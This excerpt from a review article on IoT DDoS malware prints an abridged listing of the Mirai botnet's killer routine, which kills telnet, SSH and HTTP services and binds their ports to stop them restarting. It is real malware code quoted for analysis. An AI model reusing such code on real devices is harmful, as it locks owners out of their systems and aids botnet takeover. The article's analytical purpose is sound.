Review Article
DDoS-Capable IoT Malwares: Comparative Analysis and Mirai Investigation
Listing 6
Mirai killer process kills and prevents restart of telnet, SSH, and HTTP services.
root/mirai/bot/killer.c | void killer_init(void) | | // … | // Kill telnet service and prevent it from | restarting | if (killer_kill_by_port(htons(23))) | //… | tmp_bind_addr.sin_port = htons(23); | if ((tmp_bind_fd = socket(AF_INET, | SOCK_STREAM, 0)) != −1) | | bind(tmp_bind_fd, (struct sockaddr ) | &tmp_bind_addr, | sizeof (struct sockaddr_in)); | listen(tmp_bind_fd, 1); | | // … | // Kill SSH service and prevent it from | restarting | if (killer_kill_by_port(htons(22))) | //… | tmp_bind_addr.sin_port = htons(22); | if ((tmp_bind_fd = socket(AF_INET, | SOCK_STREAM, 0)) != −1) | | bind(tmp_bind_fd, (struct sockaddr ) | & tmp_bind_addr, | sizeof (struct sockaddr_in)); | listen(tmp_bind_fd, 1); | | // … | // Kill HTTP service and prevent it from | restarting | if (killer_kill_by_port(htons(80))) | //… | tmp_bind_addr.sin_port = htons(80); | if ((tmp_bind_fd = socket(AF_INET, | SOCK_STREAM, 0)) != −1) | | bind(tmp_bind_fd, (struct sockaddr ) | & tmp_bind_addr, | sizeof (struct sockaddr_in)); | listen(tmp_bind_fd, 1); | | // … | |
|